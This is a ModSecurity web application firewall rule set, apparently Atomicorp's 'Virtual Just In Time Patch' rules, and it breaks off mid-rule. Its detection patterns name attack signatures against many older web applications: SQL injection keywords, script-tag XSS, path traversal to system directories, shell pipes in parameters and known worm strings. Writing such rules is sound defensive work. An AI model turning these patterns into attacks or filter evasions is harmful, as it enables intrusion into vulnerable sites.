#SecRule REQUEST_URI|REQUEST_BODY "img src=javascript" # "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310304,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic Javascript-through-image tag cross-site-scripting attempt'"
# Rule 310306: tomcat servlet mapping XSS
SecRule REQUEST_URI "/servlet/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310306,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2-include local command execution attempt'"
SecRule REQUEST_URI "/org\.apache\."
#Servlet session disclosure
SecRule REQUEST_URI "(?:/servlet/sessionservlet|/viewsource\.jsp)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310836,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Allaire JRun sample scripts access attempt'"
# Rule 310334: Interspire ArticleLive 2005 "articleid" Remote Cross-Site
# Scripting Vulnerability
SecRule REQUEST_URI "/articles/newcomment" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310334,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Interspire ArticleLive newcomment.php cross-site-scripting attempt'"
SecRule ARGS:articleid ">"
# Rule 310374:PunBB version <= 1.2.2 auth bypass exploit
#SecRule REQUEST_COOKIES:punbb_cookie "a\:2\:\{i\:0\;s\:.*\;i\:1\;b\:1\;\}" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310374,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PunBB cookie manipulation authentication bypass attempt'"
# Rule 310383:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/mxshop/\?mod=category&id_ctg=\'" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310383,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart mxshop SQL injection attempt'"
# Rule 310388: CPG Dragonfly XSS
SecRule REQUEST_URI "/coppermine/displayimage/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310388,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly Coppermine cross-site-scripting attempt'"
SecRule ARGS:cat "(?:(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310390:AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "/epal/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310390,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal cross-site-scripting attempt'"
SecRule ARGS:order_num "(?:(?:script|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310419:TowerBlog! Discloses Hashed Administrative Password to Remote
# users
SecRule REQUEST_URI|REQUEST_BODY "/_dat/login" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310419,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TowerBlog! _dat/login password hash disclosure attempt'"
# Rule 310019: Oracle 9iAS mod_plsql directory traversal
# CVE: "CAN-2001-1217"
SecRule REQUEST_URI "/pls/sample/admin_/help/\.\." "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310487,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle 9iAS mod_plsql directory traversal'"
# Rule 310019: Oracle 9iAS iSQLplus XSS
SecRule REQUEST_URI "/isqlplus\?action=logon" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310489,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle 9iAS iSQLplus XSS'"
SecRule ARGS:username "(?:(?:javascript|script|about|applet|activex|chrome)|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: OpenCA HTML Injection
# CVE: "CAN-2004-0787"
SecRule REQUEST_URI "/cgi-bin/pub/pki\?cmd=serverinfo" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenCA HTML Injection'"
# Rule 310019: Apache Jakarta-Tomcat? /admin Context Vulnerability
SecRule REQUEST_URI "/admin/\?op=\xc0" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Jakarta-Tomcat /admin Context Vulnerability'"
# Rule 310019: generic Common http vulnerability
SecRule REQUEST_URI|REQUEST_BODY "/\?cwd=/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Common http vulnerability'"
# Rule 310019: Gurgens Guest Book Remote Database Disclosure Vulnerability
SecRule REQUEST_URI|REQUEST_BODY "/db/genit\.dat" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Gurgens Guest Book Remote Database Disclosure Vulnerability'"
# Rule 310019: sawmill remote file access
SecRule REQUEST_URI "/cgi-bin/sawmill5" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390472,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: sawmill remote file access'"
SecRule REQUEST_URI "\x22"
# Rule 310019: Javamail info disclosure
SecRule REQUEST_URI "/download\?/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390471,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Javamail information disclosure'"
SecRule REQUEST_URI "/web/web-inf/web\.xml"
# Rule 310019: javamail file access
SecRule REQUEST_URI|REQUEST_BODY "/download\?(?:\.\./|/\.\./|/etc/|/home/|/tmp/|/usr/|/backup/|/dev/|/proc/|/var/(?:cache|spool|mail|adm|log|tmp)/)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Javamail file access'"
# Rule 310019: Invision Community Blog Module SQL injection
SecRule REQUEST_URI "/index.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Community Blog Module SQL injection'"
SecRule ARGS:mid "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310019: JBOSS Installation Path and Configuration File disclosure
#SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:/^entry/|!ARGS:/message/|!ARGS:/msg/|!ARGS:/body/ "(?:^\%\.|^\%server\.policy)" #"chain,id:390468,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JBOSS Installation Path and Configuration File disclosure'"
#SecRule REQUEST_URI "!(^/wp-admin/)"
# Rule 310019: Claroline E-Learning SQL injection
SecRule ARGS:uinfo "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+(?:from|into|table|database|index|view)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline E-Learning SQL injection'"
# Rule 310019: Forum Russian Board 4.2 Full command execution vuln
SecRule ARGS:style_edit_ok "\xC8x\E7x\ECx\E5x\EDx\E8x\F2x\FC" "t:none,t:urlDecodeUni,t:compressWhiteSpace,id:390465,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum Russian Board 4.2 Full command execution'"
# Rule 310019: cpanel XSS vuln
SecRule REQUEST_URI|ARGS "/login" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390464,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cpanel XSS vulnerability'"
SecRule ARGS:user "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: PHP-Fusion database backup file retrieval vuln
SecRule REQUEST_URI|ARGS "/(?:fusion_admin|administration)/db_backups/" "t:none,t:urlDecodeUni,t:lowercase,id:390463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Fusion database backup file retrieval'"
# Rule 310019: Wordpress cat vuln
SecRule REQUEST_URI "/wordpress/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390601,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress cat vuln'"
SecRule ARGS:cat "!(^-?[0-9])" "t:none,t:urlDecodeUni,t:compressWhiteSpace"
# Rule 310019: honetpot catch
#SecRule REQUEST_URI "\x03\x03\x03\x03\x18\x18\x18\x18\x1a\x1c\x1a\x1c\x1c4r43tr" #"t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390462,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known wormsign'"
# Rule 310019: PHP Surveyor Remote SQL Injection
SecRule REQUEST_URI "/admin/" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPlist SQL injection'"
SecRule ARGS:sid|ARGS:start|ARGS:id|ARGS:lid "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310019: netquery 3.1 Remote Command Execution vuln
SecRule ARGS:op "^modload$" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310594,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: netquery 3.1 Remote Command Execution vuln'"
SecRule ARGS:name "^net$" chain
SecRule ARGS:query "^ping$" chain
SecRule ARGS:host "\|"
# Rule 310019: PHPlist SQL injection
SecRule REQUEST_URI "lists/admin/\?page=admin" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390460,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPlist SQL injection'"
SecRule ARGS:id "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310019: python namespace exposure with karrigell services
SecRule REQUEST_FILENAME "\.ks$" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390459,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: python namespace exposure with karrigell service'"
SecRule REQUEST_URI|ARGS "(?:\?\x22|(?:file|input|open|raw_input|reload|(?:(?:s|g)et|del|has)attr|import|callable|compile|execfile|exec|globals))"
# Rule 310019: Test CGI probe
SecRule REQUEST_FILENAME "/test-cgi$" "t:none,t:urlDecodeUni,t:lowercase,id:390458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Test CGI probe'"
# Rule 310019: Annoying Cisco IOS http configuration probe attempts
SecRule REQUEST_URI "/level/[0-9]+/exec/-/+pwd" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cisco IOS http configuration probe attempts'"
#SecRule REQUEST_URI|REQUEST_BODY "content-length:.*user=.*pass=.*pass2=.*oldpass=.*loc.*(?:\x22|system)" #"id:390456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Authentication bypass attack'"
# Rule 310019: man2web cgi-scripts remote command spawn
SecRule REQUEST_URI "/(?:man-cgi|man2web|man2html)" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: man2web cgi-scripts remote command spawn'"
SecRule REQUEST_URI "(?:\x20|\|)"
# Rule 310019: SimplePHPBplog vulns
#SecRule REQUEST_URI|ARGS "<pre ?>.*command\: [a-z|0-9|\w].*pre ?> ?< ?hr" #"id:390454,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Injection Attack'"
# Rule 310019: mimicboard2 Exposure of user Credentials
SecRule REQUEST_URI "/mimic2\.dat" "t:none,t:urlDecodeUni,t:lowercase,id:390453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mimicboard2 Exposure of user Credentials'"
# Rule 310019: Mall23 eCommerce "idPage" SQL Injection Vulnerability
SecRule ARGS:idPage "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390452,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mall23 eCommerce idPage SQL Injection Vulnerability'"
# Rule 310019: TWiki "rev" Shell Command Injection Vulnerability
SecRule REQUEST_URI "/twikiusers" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability'"
SecRule ARGS:rev "![0-9]+"
# Rule 310019: TWiki "rev" Shell Command Injection Vulnerability
SecRule REQUEST_URI "/twikiusers" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390450,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability'"
SecRule ARGS:rev "(?:\'|\|)"
# Rule 310019: http header PHP code injection attacks
SecRule REQUEST_HEADERS:Client-Ip|REQUEST_HEADERS:user-agent|REQUEST_HEADERS:Referer "(?:<\?php|<[[:space:]]?\?[[:space:]]?php|<\? php)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390449,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: http header PHP code injection attack'"
SecRule REQUEST_URI "!(/administrator/index\.php)"
# Rule 310019: TWiki "%include" Shell Command Injection Vulnerability
#SecRule REQUEST_URI|ARGS|!ARGS:/^wpText/|!ARGS:description "include.*rev=.*\|.*\}" #"id:393449,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki Shell Command Injection Vulnerability'"
# Rule 310019: MediaWiki Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI|ARGS "\<(?:math|nowiki)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390448,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MediaWiki Cross-Site Scripting Vulnerabilities'"
SecRule REQUEST_URI|ARGS "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: phorum spam rules
SecRule ARGS:PHORUM_config "(?:@|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:lowercase,id:390447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum Injection Attack'"
# Rule 310019: wormsign
SecRule REQUEST_URI|REQUEST_BODY "thmc\.\$dbhost\.thmc\.\$dbname\.thmc\.\$dbuser\.thmc\.\$dbpasswd\.thmc" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390446,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known Wormsign'"
# Rule 310019: phpbb wormsign
SecRule REQUEST_URI|REQUEST_BODY "echo _ghc/rst_" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known PHP Wormsign'"
# Rule 310019: YaPiG Multiple Vulnerabilities
SecRule ARGS:Website "<[[:space:]]*(?:script|about|applet|activex|chrome)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaPiG PHP XSS vulnerability'"
# Rule 310019: YaPiG Multiple Vulnerabilities
#SecRule ARGS:title "< ?php.*php ?>" #"id:390443,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaPiG PHP code injection vulnerability'"
# Rule 310019: IBM Lotus Domino XSS attempts
#SecRule REQUEST_URI "(?:openform.*/basetarget=.*\"|openframeset.*/src=.*\">< ?/ ?frameset ?>.*< ?script ?>.*< ?/ ?script ?>)" #"id:390442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IBM Lotus Domino XSS attempts'"
# Rule 310019: HP OpenView network Node Manager Remote Command Execution Attempt
SecRule REQUEST_URI "/ovcgi/connectednodes\.ovpl\?" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390441,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HP OpenView network Node Manager Remote Command Execution Attempt'"
SecRule ARGS:node "\|"
# Rule 310019: RSA ACE/agent for Web "image" Cross-Site Scripting Vulnerability
SecRule REQUEST_URI "/webauthentication\?getpic" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390440,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RSA ACE/agent for Web image Cross-Site Scripting Vulnerability'"
SecRule REQUEST_URI "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: PHP config recon attack
SecRule REQUEST_URI "/php\.ini$" "t:none,t:urlDecodeUni,t:lowercase,id:390439,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP config recon attack'"
# Rule 310019: SaveWebPortal menu_dx.php and menu_sx.php Multiple Variable XSS
SecRule REQUEST_URI "/menu_dx\.ph" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390438,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SaveWebPortal menu_dx.php and menu_sx.php Multiple Variable XSS'"
SecRule ARGS:L_InsertCorrectly|ARGS:L_MENUDX_login|ARGS:L_MENUDX_username|ARGS:L_MENUDX_Password|ARGS:L_Ok|ARGS:IMAGES_Url|ARGS:L_MENUDX_Registration|ARGS:BANNER_Url|ARGS:L_MENUSX_Newsletter|ARGS:L_MENUDX_InsertEMail "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: eyeOS Script Insertion and Exposure of user Credentials
SecRule REQUEST_URI "/usrinfo\.xml" "t:none,t:urlDecodeUni,t:lowercase,id:390437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eyeOS Script Insertion and Exposure of user Credentials'"
# Rule 310019: cutenews shell injection vuln
SecRule REQUEST_URI "/inc/ipban\.mdu" "t:none,t:urlDecodeUni,t:lowercase,chain,id:319003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cutenews shell injection vuln'"
SecRule ARGS:add_ip "(?:php|system)"
# Rule 310019: sumthin scan
SecRule REQUEST_URI "/sumthin(:?/|$)" "t:none,t:urlDecodeUni,t:lowercase,id:319000,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attack Tool probe'"
# Rule 310019: EkinBoard 1.0.3 config.php SQL Injection through cookie
SecRule REQUEST_COOKIES:username "or isnull\(" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:319001,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EkinBoard 1.0.3 config.php SQL Injection through cookie'"
# Rule 310019: EkinBoard 1.0.3 config.php SQL Injection through cookie
#SecRule REQUEST_URI "&activate=1&allow_attch=1&attch_exts=.*php&.*attch_max_size=" # "id:319002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EkinBoard 1.0.3 config.php SQL Injection'"
# Rule 310019: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
#SecRule REQUEST_URI "/\?mid=.*&m2id=.*page=.*(?:faq_id|c_id).*(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)" #"t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390436,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Ezyhelpdesk Multiple SQL Injection Vulnerabilities'"
# Rule 310019: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
#SecRule REQUEST_URI "/\?edit=spec_view&edit_id.*(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)" #"t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390435,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Ezyhelpdesk Multiple SQL Injection Vulnerabilities'"
# Rule 310019: PmWiki 2.0.12 Cross Site Scripting
SecRule REQUEST_URI "/search " "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390434,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PmWiki 2.0.12 Cross Site Scripting'"
SecRule ARGS:action "<[[:space:]]*(?:script|about|applet|activex|chrome)"
# Rule 310019: CommodityRentals "user_id" SQL Injection Vulnerability
SecRule REQUEST_URI "/usersession" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CommodityRentals user_id SQL Injection Vulnerability'"
SecRule ARGS:userid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
# Rule 310019: Joomla! mod_poll SQL Injection
SecRule REQUEST_URI "/mod_poll" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390432,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! mod_poll SQL Injection'"
SecRule ARGS:itemid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
# Rule 310019: vTiger code inclusion attack
SecRule REQUEST_URI "/vtigercrm\.log" "t:none,t:urlDecodeUni,t:lowercase,id:390431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vTiger code inclusion attack'"
# Rule 310019: AgileBill "id" SQL Injection Vulnerability
SecRule REQUEST_URI "/\?_page=product_cat\:t_" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390430,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AgileBill id SQL Injection Vulnerability'"
SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
# Rule 310019: Fake gif file shell attacvk
#SecRule REQUEST_BODY "chr\(" #"id:310020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP shell attack'"
# Rule 310019: interesting new pattern
SecRule REQUEST_URI "/thisfilemustnotexist" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390667,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Non Existent File Hack Probe'"
# Rule 310019: SocketKB 1.1.x file include Vuln
SecRule REQUEST_URI "\?__f=(?:rating_add|category)&" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390668,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability'"
# Rule 310019: SocketKB 1.1.x file include Vuln
SecRule ARGS:art_id|ARGS:node "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390669,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability '"
# Rule 310019: Saxon XSLT command execution attacks
SecRule REQUEST_URI|ARGS "xsl(?:\:value-of select=\"run\:exec\(|run\:getruntime\(\)\, \'\")" "id:393657,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Saxon XSLT command execution attacks'"
# Rule 310019: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution
SecRule REQUEST_URI "/admin/" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393658,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Saxon XSLT command execution attacks'"
SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from|or user_id=2)"
# Rule 310019: Orca Blog SQL inj. vuln.
SecRule REQUEST_URI "/blog\?msg=(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Orca Blog SQL injection Vulnerability'"
# Rule 310019: phpMyAdmin Cross-Site Scripting Vulnerabilities
SecRule REQUEST_HEADERS:Host "(?:<[[:space:]]*(script|img src|about|applet|activex|chrome)|onmouseover=|javascript\:)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390662,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cross-Site Scripting Attempt in Host header'"
# Rule 310019: Nortel SSL VPN Web Interface XSS
SecRule REQUEST_URI "/tunnelform\.yaws" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nortel SSL VPN Web Interface XSS'"
SecRule ARGS:a "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
# Rule 310019: SyntaxCMS XSS vuln.
SecRule REQUEST_URI "/search/\?search_query=*(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SyntaxCMS XSS vulnerability'"
# Rule 310019: SiteSage "norelay_highlight_words" Cross-Site Scripting Vulnerability
SecRule ARGS:norelay_highlight_words "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability'"
# Rule 310019: Portfolio netPublish "template" Disclosure of Sensitive information
